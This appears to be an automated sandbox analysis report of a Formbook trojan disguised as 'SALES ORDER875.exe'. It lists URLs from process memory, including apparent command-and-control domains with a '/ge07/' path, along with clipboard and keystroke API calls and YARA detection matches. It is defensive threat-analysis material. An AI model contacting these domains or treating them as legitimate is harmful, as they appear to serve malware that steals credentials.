Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ool-covers76.xyz/ge07/
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ool-covers76.xyz/ge07/www.9net88.net
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ool-covers76.xyzReferer:
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pipagtxcorrelo.xyz
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pipagtxcorrelo.xyz/ge07/
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pipagtxcorrelo.xyz/ge07/www.ecurityemployment.today
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pipagtxcorrelo.xyzReferer:
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pm-22-ns-2.click
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pm-22-ns-2.click/ge07/
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pm-22-ns-2.click/ge07/www.cillascrewedsedroth.cfd
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pm-22-ns-2.clickReferer:
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rkgexg.top
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rkgexg.top/ge07/
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rkgexg.top/ge07/www.ocockbowerlybrawer.cfd
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rkgexg.topReferer:
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yegle.net
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yegle.net/ge07/
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yegle.net/ge07/www.giyztm.xyz
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.yegle.netReferer:
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zoc-marriage.xyz
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zoc-marriage.xyz/ge07/
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zoc-marriage.xyz/ge07/www.ivglass.xyz
Source: explorer.exe, 00000003.00000003.3106722139.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114272666.000000000CB58000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4140821727.000000000CB59000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zoc-marriage.xyzReferer:
Source: explorer.exe, 00000003.00000000.1848448919.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000003.00000000.1841567797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000003.00000000.1841567797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000003.00000002.4135604265.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000003.00000002.4135604265.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000003.00000002.4126395633.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4125188674.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1839005711.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1840011755.0000000003700000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000003.00000002.4135604265.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000003.00000002.4135604265.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000003.00000002.4135604265.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3114628168.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1844128294.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000003.00000000.1841567797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000003.00000000.1841567797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000003.00000000.1841567797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000003.00000000.1848448919.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000003.00000000.1848448919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4139345723.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000003.00000000.1841567797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000003.00000002.4130863313.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000003.00000002.4130863313.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1841567797.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_003FEAFF

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003FED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_003FED6A

Source: C:\Users\user\Desktop\SALES ORDER875.exe

0_2_003FEAFF

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_003EAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_003EAA57

Source: C:\Users\user\Desktop\SALES ORDER875.exe

Code function: 0_2_00419576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00419576

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
